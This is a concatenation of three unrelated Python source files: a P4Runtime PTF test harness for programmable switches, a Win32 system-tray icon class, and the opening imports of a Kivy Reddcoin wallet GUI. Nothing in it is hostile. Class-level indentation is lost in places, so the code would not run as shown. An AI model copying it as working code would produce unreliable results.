        self.fail("CPU port is not set")
    self.cpu_port = int(cpu_port)
    pltfm = testutils.test_param_get("pltfm")
    if pltfm is not None and pltfm == 'hw' and getattr(self, "_skip_on_hw", False):
        raise SkipTest("Skipping test in HW")
    self.channel = grpc.insecure_channel(grpc_addr)
    self.stub = p4runtime_pb2.P4RuntimeStub(self.channel)
    # Parse the text-format p4info file describing the P4 program.
    proto_txt_path = testutils.test_param_get("p4info")
    self.p4info = p4info_pb2.P4Info()
    with open(proto_txt_path, "rb") as fin:
        google.protobuf.text_format.Merge(fin.read(), self.p4info)
    self.import_p4info_names()
    # used to store write requests sent to the P4Runtime server, useful for
    # autocleanup of tests (see definition of autocleanup decorator below)
    self.reqs = []
    self.election_id = 1
    self.set_up_stream()
# In order to make writing tests easier, we accept any suffix that uniquely
# identifies the object among p4info objects of the same type.
def import_p4info_names(self):
    """Build self.p4info_obj_map: (object type, name suffix) -> p4info object.

    Every dot-separated suffix of each object's fully-qualified name is
    registered; suffixes that occur more than once within an object type are
    removed afterwards, so only unambiguous suffixes remain usable.
    """
    self.p4info_obj_map = {}
    suffix_count = Counter()
    for p4_obj_type in ["tables", "action_profiles", "actions", "counters",
                        "direct_counters"]:
        for obj in getattr(self.p4info, p4_obj_type):
            pre = obj.preamble
            suffix = None
            # Grow the suffix right-to-left: "c", "b.c", "a.b.c", ...
            for s in reversed(pre.name.split(".")):
                suffix = s if suffix is None else s + "." + suffix
                key = (p4_obj_type, suffix)
                self.p4info_obj_map[key] = obj
                suffix_count[key] += 1
    # Drop ambiguous suffixes (shared by several objects of one type).
    for key, c in suffix_count.items():
        if c > 1:
            del self.p4info_obj_map[key]
def set_up_stream(self):
    """Open the bidirectional StreamChannel RPC and perform arbitration.

    Outgoing messages are pulled from self.stream_out_q by a generator;
    incoming messages are pushed into self.stream_in_q by a daemon-style
    receive thread.
    """
    self.stream_out_q = Queue.Queue()
    self.stream_in_q = Queue.Queue()

    def stream_req_iterator():
        # Blocks on the out queue; a None sentinel ends the stream (see
        # tear_down_stream).
        while True:
            p = self.stream_out_q.get()
            if p is None:
                break
            yield p

    def stream_recv(stream):
        # Runs on the background thread, funneling every server message
        # into the in queue.
        for p in stream:
            self.stream_in_q.put(p)

    self.stream = self.stub.StreamChannel(stream_req_iterator())
    self.stream_recv_thread = threading.Thread(
        target=stream_recv, args=(self.stream,))
    self.stream_recv_thread.start()
    self.handshake()
def handshake(self):
    """Send a master arbitration request for (device_id, election_id) and
    wait for the server's arbitration reply; fail the test on timeout."""
    req = p4runtime_pb2.StreamMessageRequest()
    arbitration = req.arbitration
    arbitration.device_id = self.device_id
    election_id = arbitration.election_id
    election_id.high = 0
    election_id.low = self.election_id
    self.stream_out_q.put(req)
    rep = self.get_stream_packet("arbitration", timeout=2)
    if rep is None:
        self.fail("Failed to establish handshake")
def tearDown(self):
    # Close the stream before running the base teardown.
    self.tear_down_stream()
    BaseTest.tearDown(self)

def tear_down_stream(self):
    # The None sentinel makes stream_req_iterator return, which closes the
    # RPC; that in turn terminates the receive thread's for-loop.
    self.stream_out_q.put(None)
    self.stream_recv_thread.join()

def get_packet_in(self, timeout=2):
    """Return the next PacketIn message from the stream; fail on timeout."""
    msg = self.get_stream_packet("packet", timeout)
    if msg is None:
        self.fail("Packet in not received")
    else:
        return msg.packet
def verify_packet_in(self, exp_pkt, exp_in_port, timeout=2):
    """Assert that the next packet-in matches exp_pkt and arrived on
    exp_in_port; fail the test with a descriptive message otherwise.

    Assumes metadata[0] of the PacketIn message is the 2-byte ingress port
    -- TODO confirm against the P4 program's controller_packet_metadata.
    """
    # BUG FIX: `struct` and `Ether` were referenced without ever being
    # imported in this module, so both failure paths raised NameError
    # instead of reporting the real mismatch. Import them locally.
    import struct
    from scapy.all import Ether
    pkt_in_msg = self.get_packet_in(timeout=timeout)
    in_port_ = stringify(exp_in_port, 2)
    rx_in_port_ = pkt_in_msg.metadata[0].value
    if in_port_ != rx_in_port_:
        rx_inport = struct.unpack("!h", rx_in_port_)[0]
        self.fail("Wrong packet-in ingress port, expected {} but received was {}"
                  .format(exp_in_port, rx_inport))
    rx_pkt = Ether(pkt_in_msg.payload)
    if not match_exp_pkt(exp_pkt, rx_pkt):
        self.fail("Received packet-in is not the expected one\n" + format_pkt_match(rx_pkt, exp_pkt))
def get_stream_packet(self, type_, timeout=1):
    """Return the next stream message having field `type_` set (e.g.
    "packet", "arbitration"), or None if `timeout` seconds elapse.

    Messages of other types received in the meantime are discarded.
    """
    start = time.time()
    try:
        while True:
            remaining = timeout - (time.time() - start)
            if remaining < 0:
                break
            msg = self.stream_in_q.get(timeout=remaining)
            if not msg.HasField(type_):
                continue
            return msg
    # BUG FIX: the original bare `except:` swallowed *every* exception
    # (including misuse of HasField); only the queue timeout is expected.
    except Queue.Empty:
        pass
    return None
def send_packet_out(self, packet):
    """Send a PacketOut message to the switch over the stream channel."""
    packet_out_req = p4runtime_pb2.StreamMessageRequest()
    packet_out_req.packet.CopyFrom(packet)
    self.stream_out_q.put(packet_out_req)

def swports(self, idx):
    """Return the idx-th switch port from the PTF interface config; fail
    the test if idx is out of bounds."""
    if idx >= len(self._swports):
        self.fail("Index {} is out-of-bound of port map".format(idx))
    return self._swports[idx]
def get_obj(self, p4_obj_type, p4_name):
    """Look up a p4info object by (type, unambiguous name suffix); see
    import_p4info_names. Raises if the name is unknown or ambiguous."""
    key = (p4_obj_type, p4_name)
    obj = self.p4info_obj_map.get(key, None)
    if obj is None:
        raise Exception("Unable to find %s '%s' in p4info" % (p4_obj_type, p4_name))
    return obj

def get_obj_id(self, p4_obj_type, p4_name):
    """Return the numeric p4info id of the named object."""
    obj = self.get_obj(p4_obj_type, p4_name)
    return obj.preamble.id

def get_param_id(self, action_name, param_name):
    """Return the id of an action parameter, given action and param names."""
    a = self.get_obj("actions", action_name)
    for p in a.params:
        if p.name == param_name:
            return p.id
    raise Exception("Param '%s' not found in action '%s'" % (param_name, action_name))

def get_mf_id(self, table_name, mf_name):
    """Return the id of a table match field, given table and field names."""
    t = self.get_obj("tables", table_name)
    # NOTE(review): get_obj raises rather than returning None, so this
    # branch looks unreachable; kept as-is.
    if t is None:
        return None
    for mf in t.match_fields:
        if mf.name == mf_name:
            return mf.id
    raise Exception("Match field '%s' not found in table '%s'" % (mf_name, table_name))
# These are attempts at convenience functions aimed at making writing
# P4Runtime PTF tests easier.
# NOTE: all match values below are Python 2 byte strings (str); the helpers
# use ord/chr/xrange and integer `/` division accordingly.

class MF(object):
    """Base class for match-field helpers; stores only the field name."""
    def __init__(self, mf_name):
        self.name = mf_name

class Exact(MF):
    """Exact match on value `v` (raw byte string)."""
    def __init__(self, mf_name, v):
        super(P4RuntimeTest.Exact, self).__init__(mf_name)
        self.v = v

    def add_to(self, mf_id, mk):
        # Append this field to the repeated FieldMatch container `mk`.
        mf = mk.add()
        mf.field_id = mf_id
        mf.exact.value = self.v

class Lpm(MF):
    """Longest-prefix match: value `v` (raw byte string), prefix len `pLen`."""
    def __init__(self, mf_name, v, pLen):
        super(P4RuntimeTest.Lpm, self).__init__(mf_name)
        self.v = v
        self.pLen = pLen

    def add_to(self, mf_id, mk):
        # P4Runtime mandates that the match field should be omitted for
        # "don't care" LPM matches (i.e. when prefix length is zero)
        if self.pLen == 0:
            return
        mf = mk.add()
        mf.field_id = mf_id
        mf.lpm.prefix_len = self.pLen
        mf.lpm.value = ''
        # P4Runtime now has strict rules regarding ternary matches: in the
        # case of LPM, trailing bits in the value (after prefix) must be set
        # to 0.
        # Copy the fully-covered bytes verbatim (py2 integer division).
        first_byte_masked = self.pLen / 8
        for i in xrange(first_byte_masked):
            mf.lpm.value += self.v[i]
        if first_byte_masked == len(self.v):
            return
        # Mask the partial byte at the prefix boundary...
        r = self.pLen % 8
        mf.lpm.value += chr(
            ord(self.v[first_byte_masked]) & (0xff << (8 - r)))
        # ...and zero all remaining (don't-care) bytes.
        for i in range(first_byte_masked + 1, len(self.v)):
            mf.lpm.value += '\x00'

class Ternary(MF):
    """Ternary match: value `v` and `mask`, equal-length raw byte strings."""
    def __init__(self, mf_name, v, mask):
        super(P4RuntimeTest.Ternary, self).__init__(mf_name)
        self.v = v
        self.mask = mask

    def add_to(self, mf_id, mk):
        # P4Runtime mandates that the match field should be omitted for
        # "don't care" ternary matches (i.e. when mask is zero)
        if all(c == '\x00' for c in self.mask):
            return
        mf = mk.add()
        mf.field_id = mf_id
        assert (len(self.mask) == len(self.v))
        mf.ternary.mask = self.mask
        mf.ternary.value = ''
        # P4Runtime now has strict rules regarding ternary matches: in the
        # case of Ternary, "don't-care" bits in the value must be set to 0
        for i in xrange(len(self.mask)):
            mf.ternary.value += chr(ord(self.v[i]) & ord(self.mask[i]))

class Range(MF):
    """Range match: inclusive [low, high], equal-length raw byte strings."""
    def __init__(self, mf_name, low, high):
        super(P4RuntimeTest.Range, self).__init__(mf_name)
        self.low = low
        self.high = high

    def add_to(self, mf_id, mk):
        # P4Runtime mandates that the match field should be omitted for
        # "don't care" range matches (i.e. when all possible values are
        # included in the range)
        # TODO(antonin): negative values?
        low_is_zero = all(c == '\x00' for c in self.low)
        high_is_max = all(c == '\xff' for c in self.high)
        if low_is_zero and high_is_max:
            return
        mf = mk.add()
        mf.field_id = mf_id
        assert (len(self.high) == len(self.low))
        mf.range.low = self.low
        mf.range.high = self.high
# Sets the match key for a p4::TableEntry object. mk needs to be an iterable
# object of MF instances
def set_match_key(self, table_entry, t_name, mk):
    """Fill table_entry.match from the MF helpers in `mk` for table `t_name`."""
    for mf in mk:
        mf_id = self.get_mf_id(t_name, mf.name)
        mf.add_to(mf_id, table_entry.match)

def set_action(self, action, a_name, params):
    """Set the action id and parameter values on a p4::Action message.

    `params` is an iterable of (param name, value) 2-tuples. get_action_id
    is one of the generated getters attached below the class.
    """
    action.action_id = self.get_action_id(a_name)
    for p_name, v in params:
        param = action.params.add()
        param.param_id = self.get_param_id(a_name, p_name)
        param.value = v

# Sets the action & action data for a p4::TableEntry object. params needs to
# be an iterable object of 2-tuples (<param_name>, <value>).
def set_action_entry(self, table_entry, a_name, params):
    self.set_action(table_entry.action.action, a_name, params)

def _write(self, req):
    """Issue the Write RPC; wrap UNKNOWN errors in P4RuntimeWriteException
    so the per-update errors are visible. Other RPC errors propagate."""
    try:
        return self.stub.Write(req)
    except grpc.RpcError as e:
        if e.code() != grpc.StatusCode.UNKNOWN:
            raise e
        raise P4RuntimeWriteException(e)

def write_request(self, req, store=True):
    """Send a write request; record it in self.reqs for autocleanup unless
    store is False."""
    rep = self._write(req)
    if store:
        self.reqs.append(req)
    return rep

def get_new_write_request(self):
    """Return a WriteRequest pre-filled with this test's device and
    election ids."""
    req = p4runtime_pb2.WriteRequest()
    req.device_id = self.device_id
    election_id = req.election_id
    election_id.high = 0
    election_id.low = self.election_id
    return req
#
# Convenience functions to build and send P4Runtime write requests
#

def _push_update_member(self, req, ap_name, mbr_id, a_name, params,
                        update_type):
    """Append an action-profile-member update of `update_type` to `req`."""
    update = req.updates.add()
    update.type = update_type
    ap_member = update.entity.action_profile_member
    ap_member.action_profile_id = self.get_ap_id(ap_name)
    ap_member.member_id = mbr_id
    self.set_action(ap_member.action, a_name, params)

def push_update_add_member(self, req, ap_name, mbr_id, a_name, params):
    """Append an INSERT member update to `req`."""
    self._push_update_member(req, ap_name, mbr_id, a_name, params,
                             p4runtime_pb2.Update.INSERT)

def send_request_add_member(self, ap_name, mbr_id, a_name, params):
    """Insert an action profile member; returns (request, response)."""
    req = self.get_new_write_request()
    self.push_update_add_member(req, ap_name, mbr_id, a_name, params)
    return req, self.write_request(req)

def push_update_modify_member(self, req, ap_name, mbr_id, a_name, params):
    """Append a MODIFY member update to `req`."""
    self._push_update_member(req, ap_name, mbr_id, a_name, params,
                             p4runtime_pb2.Update.MODIFY)

def send_request_modify_member(self, ap_name, mbr_id, a_name, params):
    """Modify a member; not recorded for autocleanup (store=False) since a
    MODIFY must not be replayed as a DELETE."""
    req = self.get_new_write_request()
    self.push_update_modify_member(req, ap_name, mbr_id, a_name, params)
    return req, self.write_request(req, store=False)

def push_update_add_group(self, req, ap_name, grp_id, grp_size=32,
                          mbr_ids=()):
    """Append an INSERT group update with the given member ids to `req`."""
    update = req.updates.add()
    update.type = p4runtime_pb2.Update.INSERT
    ap_group = update.entity.action_profile_group
    ap_group.action_profile_id = self.get_ap_id(ap_name)
    ap_group.group_id = grp_id
    ap_group.max_size = grp_size
    for mbr_id in mbr_ids:
        member = ap_group.members.add()
        member.member_id = mbr_id

def send_request_add_group(self, ap_name, grp_id, grp_size=32, mbr_ids=()):
    """Insert an action profile group; returns (request, response)."""
    req = self.get_new_write_request()
    self.push_update_add_group(req, ap_name, grp_id, grp_size, mbr_ids)
    return req, self.write_request(req)

def push_update_set_group_membership(self, req, ap_name, grp_id,
                                     mbr_ids=()):
    """Append a MODIFY group update replacing the group's membership."""
    update = req.updates.add()
    update.type = p4runtime_pb2.Update.MODIFY
    ap_group = update.entity.action_profile_group
    ap_group.action_profile_id = self.get_ap_id(ap_name)
    ap_group.group_id = grp_id
    for mbr_id in mbr_ids:
        member = ap_group.members.add()
        member.member_id = mbr_id

def send_request_set_group_membership(self, ap_name, grp_id, mbr_ids=()):
    """Replace a group's membership; not recorded for autocleanup."""
    req = self.get_new_write_request()
    self.push_update_set_group_membership(req, ap_name, grp_id, mbr_ids)
    return req, self.write_request(req, store=False)
#
# for all add_entry function, use mk == None for default entry
#
# TODO(antonin): The current P4Runtime reference implementation on p4lang
# does not support resetting the default entry (i.e. a DELETE operation on
# the default entry), which is why we make sure not to include it in the
# list used for autocleanup, by passing store=False to write_request calls.
#

def push_update_add_entry_to_action(self, req, t_name, mk, a_name, params, priority=0):
    """Append an INSERT table-entry update bound directly to an action."""
    update = req.updates.add()
    update.type = p4runtime_pb2.Update.INSERT
    table_entry = update.entity.table_entry
    table_entry.table_id = self.get_table_id(t_name)
    table_entry.priority = priority
    # An empty or missing match key designates the table's default entry.
    if mk is None or len(mk) == 0:
        table_entry.is_default_action = True
    else:
        self.set_match_key(table_entry, t_name, mk)
    self.set_action_entry(table_entry, a_name, params)

def send_request_add_entry_to_action(self, t_name, mk, a_name, params, priority=0):
    """Insert a table entry -> action; default entries are not stored for
    autocleanup (see TODO above)."""
    req = self.get_new_write_request()
    self.push_update_add_entry_to_action(req, t_name, mk, a_name, params, priority)
    return req, self.write_request(req, store=(mk is not None))

def push_update_add_entry_to_member(self, req, t_name, mk, mbr_id):
    """Append an INSERT table-entry update bound to an action profile member."""
    update = req.updates.add()
    update.type = p4runtime_pb2.Update.INSERT
    table_entry = update.entity.table_entry
    table_entry.table_id = self.get_table_id(t_name)
    if mk is not None:
        self.set_match_key(table_entry, t_name, mk)
    else:
        table_entry.is_default_action = True
    table_entry.action.action_profile_member_id = mbr_id

def send_request_add_entry_to_member(self, t_name, mk, mbr_id):
    """Insert a table entry -> member; default entries are not stored."""
    req = self.get_new_write_request()
    self.push_update_add_entry_to_member(req, t_name, mk, mbr_id)
    return req, self.write_request(req, store=(mk is not None))

def push_update_add_entry_to_group(self, req, t_name, mk, grp_id):
    """Append an INSERT table-entry update bound to an action profile group."""
    update = req.updates.add()
    update.type = p4runtime_pb2.Update.INSERT
    table_entry = update.entity.table_entry
    table_entry.table_id = self.get_table_id(t_name)
    if mk is not None:
        self.set_match_key(table_entry, t_name, mk)
    else:
        table_entry.is_default_action = True
    table_entry.action.action_profile_group_id = grp_id

def send_request_add_entry_to_group(self, t_name, mk, grp_id):
    """Insert a table entry -> group; default entries are not stored."""
    req = self.get_new_write_request()
    self.push_update_add_entry_to_group(req, t_name, mk, grp_id)
    return req, self.write_request(req, store=(mk is not None))
# iterates over all requests in reverse order; if they are INSERT updates,
# replay them as DELETE updates; this is a convenient way to clean-up a lot
# of switch state
def undo_write_requests(self, reqs):
    """Replay every INSERT update in `reqs` (newest first) as a DELETE, in
    a single new write request."""
    updates = []
    for req in reversed(reqs):
        for update in reversed(req.updates):
            if update.type == p4runtime_pb2.Update.INSERT:
                updates.append(update)
    new_req = self.get_new_write_request()
    for update in updates:
        # NOTE(review): `updates` holds references into the stored requests,
        # so this mutates their type in place before copying -- a second
        # call with the same reqs would find no INSERTs left.
        update.type = p4runtime_pb2.Update.DELETE
        new_req.updates.add().CopyFrom(update)
    self._write(new_req)
# Add p4info object and object id "getters" for each object type; these are just
# wrappers around P4RuntimeTest.get_obj and P4RuntimeTest.get_obj_id.
# For example: get_table(x) and get_table_id(x) respectively call
# get_obj("tables", x) and get_obj_id("tables", x)
for obj_type, nickname in [("tables", "table"),
                           ("action_profiles", "ap"),
                           ("actions", "action"),
                           ("counters", "counter"),
                           ("direct_counters", "direct_counter")]:
    getter_name = "get_%s" % nickname
    setattr(P4RuntimeTest, getter_name,
            partialmethod(P4RuntimeTest.get_obj, obj_type))
    id_getter_name = "get_%s_id" % nickname
    setattr(P4RuntimeTest, id_getter_name,
            partialmethod(P4RuntimeTest.get_obj_id, obj_type))
# this decorator can be used on the runTest method of P4Runtime PTF tests
# when it is used, the undo_write_requests will be called at the end of the test
# (irrespective of whether the test was a failure, a success, or an exception
# was raised). When this is used, all write requests must be performed through
# one of the send_request_* convenience functions, or by calling write_request;
# do not use stub.Write directly!
# most of the time, it is a great idea to use this decorator, as it makes the
# tests less verbose. In some circumstances, it is difficult to use it, in
# particular when the test itself issues DELETE request to remove some
# objects. In this case you will want to do the cleanup yourself (in the
# tearDown function for example); you can still use undo_write_request which
# should make things easier.
# because the PTF test writer needs to choose whether or not to use autocleanup,
# it seems more appropriate to define a decorator for this rather than do it
# unconditionally in the P4RuntimeTest tearDown method.
def autocleanup(f):
    """Decorator for runTest methods: after the test (pass, fail or error),
    undo every write request recorded in test.reqs via undo_write_requests.

    Requires all writes to go through write_request / send_request_*."""
    @wraps(f)
    def handle(test, *args, **kwargs):
        assert (isinstance(test, P4RuntimeTest))
        try:
            return f(test, *args, **kwargs)
        finally:
            # Runs regardless of the test outcome.
            test.undo_write_requests(test.reqs)
    return handle
def skip_on_hw(cls):
    """Class decorator: mark a test class so setUp skips it when the
    'pltfm' test param is 'hw'."""
    setattr(cls, "_skip_on_hw", True)
    return cls
|
traybar.py | import os
from .win32_adapter import *
import threading
import uuid
class SysTrayIcon(object):
"""
menu_options: tuple of tuples (menu text, menu icon path or None, function name)
menu text and tray hover text should be Unicode
hover_text length is limited to 128; longer text will be truncated
Can be used as context manager to enable automatic termination of tray
if parent thread is closed:
with SysTrayIcon(icon, hover_text) as systray:
for item in ['item1', 'item2', 'item3']:
systray.update(hover_text=item)
do_something(item)
"""
QUIT = 'QUIT'
SPECIAL_ACTIONS = [QUIT]
FIRST_ID = 1023
def __init__(self,
             icon,
             hover_text,
             menu_options=None,
             on_quit=None,
             default_menu_index=None,
             window_class_name=None):
    """Create the tray icon object (not shown until start() is called).

    icon: path to a .ico file, or None for the default application icon.
    hover_text: tooltip text (truncated to 128 chars by the shell).
    menu_options: tuple of (text, icon path or None, action) tuples; the
        action is a callable, a nested menu_options tuple, or SysTrayIcon.QUIT.
    on_quit: callable invoked with this instance when the tray is destroyed.
    default_menu_index: index of the option run on double-click (default 0).
    window_class_name: Win32 window class name; randomized if not given.
    """
    self._icon = icon
    self._icon_shared = False
    self._hover_text = hover_text
    self._on_quit = on_quit
    # Always append a Quit entry after the user-supplied options.
    menu_options = menu_options or ()
    menu_options = menu_options + (('Quit', None, SysTrayIcon.QUIT),)
    self._next_action_id = SysTrayIcon.FIRST_ID
    # Built as a set of (id, action) pairs during id assignment, then
    # converted to a dict for lookup.
    self._menu_actions_by_id = set()
    self._menu_options = self._add_ids_to_menu_options(list(menu_options))
    self._menu_actions_by_id = dict(self._menu_actions_by_id)
    window_class_name = window_class_name or ("SysTrayIconPy-%s" % (str(uuid.uuid4())))
    self._default_menu_index = (default_menu_index or 0)
    self._window_class_name = encode_for_locale(window_class_name)
    # Map window messages to handlers; the TaskbarCreated broadcast lets us
    # re-add the icon if explorer.exe restarts.
    self._message_dict = {RegisterWindowMessage("TaskbarCreated"): self._restart,
                          WM_DESTROY: self._destroy,
                          WM_CLOSE: self._destroy,
                          WM_COMMAND: self._command,
                          WM_USER+20: self._notify}
    self._notify_id = None
    self._message_loop_thread = None
    self._hwnd = None
    self._hicon = 0
    self._hinst = None
    self._window_class = None
    self._menu = None
    self._register_class()
def __enter__(self):
    """Context manager so SysTray can automatically close"""
    self.start()
    return self

def __exit__(self, *args):
    """Context manager so SysTray can automatically close"""
    self.shutdown()

def WndProc(self, hwnd, msg, wparam, lparam):
    """Win32 window procedure: dispatch known messages to their handlers,
    then always fall through to DefWindowProc."""
    hwnd = HANDLE(hwnd)
    wparam = WPARAM(wparam)
    lparam = LPARAM(lparam)
    if msg in self._message_dict:
        self._message_dict[msg](hwnd, msg, wparam.value, lparam.value)
    return DefWindowProc(hwnd, msg, wparam, lparam)

def _register_class(self):
    # Register the Window class.
    self._window_class = WNDCLASS()
    self._hinst = self._window_class.hInstance = GetModuleHandle(None)
    self._window_class.lpszClassName = self._window_class_name
    self._window_class.style = CS_VREDRAW | CS_HREDRAW
    self._window_class.hCursor = LoadCursor(0, IDC_ARROW)
    self._window_class.hbrBackground = COLOR_WINDOW
    # Keep the callback reference on self so it is not garbage collected
    # while the window lives.
    self._window_class.lpfnWndProc = LPFN_WNDPROC(self.WndProc)
    RegisterClass(ctypes.byref(self._window_class))
def _create_window(self):
    # Create the hidden top-level window that receives the tray messages.
    style = WS_OVERLAPPED | WS_SYSMENU
    self._hwnd = CreateWindowEx(0, self._window_class_name,
                                self._window_class_name,
                                style,
                                0,
                                0,
                                CW_USEDEFAULT,
                                CW_USEDEFAULT,
                                0,
                                0,
                                self._hinst,
                                None)
    UpdateWindow(self._hwnd)
    self._refresh_icon()

def _message_loop_func(self):
    # Runs on the worker thread: create the window, then pump messages
    # until WM_QUIT is posted (see _destroy).
    self._create_window()
    PumpMessages()

def start(self):
    """Show the tray icon by starting the message-loop thread (idempotent)."""
    if self._hwnd:
        return  # already started
    self._message_loop_thread = threading.Thread(target=self._message_loop_func)
    self._message_loop_thread.start()

def shutdown(self):
    """Close the tray window and wait for the message-loop thread to exit."""
    if not self._hwnd:
        return  # not started
    PostMessage(self._hwnd, WM_CLOSE, 0, 0)
    self._message_loop_thread.join()
def update(self, icon=None, hover_text=None, menu_options=None):  # "menu_options=None" added to allow updating the menu options
    """ update icon image and/or hover text and/or menu options"""
    if icon:
        self._icon = icon
        self._load_icon()
    if hover_text:
        self._hover_text = hover_text
    # "if menu_options" added to allow updating the menu options
    if menu_options:
        # Rebuild the id -> action mapping exactly as done in __init__.
        menu_options = menu_options or ()
        menu_options = menu_options + (('Quit', None, SysTrayIcon.QUIT),)
        self._next_action_id = SysTrayIcon.FIRST_ID
        self._menu_actions_by_id = set()
        self._menu_options = self._add_ids_to_menu_options(list(menu_options))
        self._menu_actions_by_id = dict(self._menu_actions_by_id)
        self._menu = None  # destroy the old menu created by right clicking the icon
    self._refresh_icon()

def _add_ids_to_menu_options(self, menu_options):
    """Recursively assign a unique wID to every option.

    Returns the options with the id appended to each tuple, and records
    (id, action) pairs into self._menu_actions_by_id (a set at this point).
    """
    result = []
    for menu_option in menu_options:
        option_text, option_icon, option_action = menu_option
        if callable(option_action) or option_action in SysTrayIcon.SPECIAL_ACTIONS:
            self._menu_actions_by_id.add((self._next_action_id, option_action))
            result.append(menu_option + (self._next_action_id,))
        elif non_string_iterable(option_action):
            # Nested submenu: recurse into its option list.
            result.append((option_text,
                           option_icon,
                           self._add_ids_to_menu_options(option_action),
                           self._next_action_id))
        else:
            raise Exception('Unknown item', option_text, option_icon, option_action)
        self._next_action_id += 1
    return result
def _load_icon(self):
    """Load the configured .ico file, falling back to the shared system icon."""
    # release previous icon, if a custom one was loaded
    # note: it's important *not* to release the icon if we loaded the default system icon (with
    # the LoadIcon function) - this is why we assign self._hicon only if it was loaded using LoadImage
    if not self._icon_shared and self._hicon != 0:
        DestroyIcon(self._hicon)
        self._hicon = 0
    # Try and find a custom icon
    hicon = 0
    if self._icon is not None and os.path.isfile(self._icon):
        icon_flags = LR_LOADFROMFILE | LR_DEFAULTSIZE
        icon = encode_for_locale(self._icon)
        hicon = self._hicon = LoadImage(0, icon, IMAGE_ICON, 0, 0, icon_flags)
        self._icon_shared = False
    # Can't find icon file - using default shared icon
    if hicon == 0:
        self._hicon = LoadIcon(0, IDI_APPLICATION)
        self._icon_shared = True
        self._icon = None

def _refresh_icon(self):
    """(Re)add or update the shell notification icon; no-op before the
    window exists."""
    if self._hwnd is None:
        return
    if self._hicon == 0:
        self._load_icon()
    # NIM_ADD on first display, NIM_MODIFY afterwards.
    if self._notify_id:
        message = NIM_MODIFY
    else:
        message = NIM_ADD
    self._notify_id = NotifyData(self._hwnd,
                                 0,
                                 NIF_ICON | NIF_MESSAGE | NIF_TIP,
                                 WM_USER+20,
                                 self._hicon,
                                 self._hover_text)
    Shell_NotifyIcon(message, ctypes.byref(self._notify_id))
def _restart(self, hwnd, msg, wparam, lparam):
    # TaskbarCreated handler: explorer.exe restarted, re-add our icon.
    self._refresh_icon()

def _destroy(self, hwnd, msg, wparam, lparam):
    # WM_DESTROY / WM_CLOSE handler: notify the owner, remove the shell
    # icon and stop the message loop.
    if self._on_quit:
        self._on_quit(self)
    nid = NotifyData(self._hwnd, 0)
    Shell_NotifyIcon(NIM_DELETE, ctypes.byref(nid))
    PostQuitMessage(0)  # Terminate the app.
    # TODO * release self._menu with DestroyMenu and reset the member
    #      * release self._hicon with DestroyIcon and reset the member
    #      * release loaded menu icons (loaded in _prep_menu_icon) with DeleteObject
    #        (we don't keep those objects anywhere now)
    self._hwnd = None
    self._notify_id = None

def _notify(self, hwnd, msg, wparam, lparam):
    # Mouse events on the tray icon (lparam carries the mouse message).
    if lparam == WM_LBUTTONDBLCLK:
        # Double-click runs the default menu option.
        self._execute_menu_option(self._default_menu_index + SysTrayIcon.FIRST_ID)
    elif lparam == WM_RBUTTONUP:
        self._show_menu()
    elif lparam == WM_LBUTTONUP:
        pass
    return True

def _show_menu(self):
    # Build the popup menu lazily, then display it at the cursor position.
    if self._menu is None:
        self._menu = CreatePopupMenu()
        self._create_menu(self._menu, self._menu_options)
        #SetMenuDefaultItem(self._menu, 1000, 0)
    pos = POINT()
    GetCursorPos(ctypes.byref(pos))
    # See http://msdn.microsoft.com/library/default.asp?url=/library/en-us/winui/menus_0hdi.asp
    SetForegroundWindow(self._hwnd)
    TrackPopupMenu(self._menu,
                   TPM_LEFTALIGN,
                   pos.x,
                   pos.y,
                   0,
                   self._hwnd,
                   None)
    PostMessage(self._hwnd, WM_NULL, 0, 0)
def _create_menu(self, menu, menu_options):
    # Insert in reverse order so the first option ends up at the top.
    for option_text, option_icon, option_action, option_id in menu_options[::-1]:
        if option_icon:
            option_icon = self._prep_menu_icon(option_icon)
        if option_id in self._menu_actions_by_id:
            # Leaf item bound to an action id (handled in _command).
            item = PackMENUITEMINFO(text=option_text,
                                    hbmpItem=option_icon,
                                    wID=option_id)
            InsertMenuItem(menu, 0, 1, ctypes.byref(item))
        else:
            # Nested option list: build a submenu recursively.
            submenu = CreatePopupMenu()
            self._create_menu(submenu, option_action)
            item = PackMENUITEMINFO(text=option_text,
                                    hbmpItem=option_icon,
                                    hSubMenu=submenu)
            InsertMenuItem(menu, 0, 1, ctypes.byref(item))

def _prep_menu_icon(self, icon):
    """Render a .ico file into a small-icon-sized bitmap for a menu item."""
    icon = encode_for_locale(icon)
    # First load the icon.
    ico_x = GetSystemMetrics(SM_CXSMICON)
    ico_y = GetSystemMetrics(SM_CYSMICON)
    hicon = LoadImage(0, icon, IMAGE_ICON, ico_x, ico_y, LR_LOADFROMFILE)
    hdcBitmap = CreateCompatibleDC(None)
    # NOTE(review): this screen DC is never released with ReleaseDC -- a
    # per-call GDI handle leak; confirm win32_adapter exports ReleaseDC
    # before fixing.
    hdcScreen = GetDC(None)
    hbm = CreateCompatibleBitmap(hdcScreen, ico_x, ico_y)
    hbmOld = SelectObject(hdcBitmap, hbm)
    # Fill the background.
    brush = GetSysColorBrush(COLOR_MENU)
    FillRect(hdcBitmap, ctypes.byref(RECT(0, 0, 16, 16)), brush)
    # draw the icon
    DrawIconEx(hdcBitmap, 0, 0, hicon, ico_x, ico_y, 0, 0, DI_NORMAL)
    SelectObject(hdcBitmap, hbmOld)
    # No need to free the brush
    DeleteDC(hdcBitmap)
    DestroyIcon(hicon)
    return hbm
def _command(self, hwnd, msg, wparam, lparam):
    # WM_COMMAND handler: the low word of wparam is the chosen item's wID.
    id = LOWORD(wparam)
    self._execute_menu_option(id)

def _execute_menu_option(self, id):
    """Run the action bound to menu item `id` (or quit for QUIT)."""
    menu_action = self._menu_actions_by_id[id]
    if menu_action == SysTrayIcon.QUIT:
        # Destroying the window triggers _destroy, which ends the loop.
        DestroyWindow(self._hwnd)
    else:
        menu_action(self)
def non_string_iterable(obj):
    """Return True when `obj` is iterable but is not a string."""
    if isinstance(obj, str):
        # Strings iterate over their characters, but menu handling must
        # treat them as scalars.
        return False
    try:
        iter(obj)
    except TypeError:
        return False
    return True
|
main_window.py | import re
import os
import sys
import time
import datetime
import traceback
from decimal import Decimal
import threading
import reddelectrum as electrum
from reddelectrum.bitcoin import TYPE_ADDRESS
from reddelectrum import WalletStorage, Wallet
from reddelectrum_gui.kivy.i18n import _
from reddelectrum.paymentrequest import InvoiceStore
from reddelectrum.util import profiler, InvalidPassword
from reddelectrum.plugins import run_hook
from reddelectrum.util import format_satoshis, format_satoshis_plain
from reddelectrum.paymentrequest import PR_UNPAID, PR_PAID, PR_UNKNOWN, PR_EXPIRED
from kivy.app import App
from kivy.core.window import Window
from kivy.logger import Logger
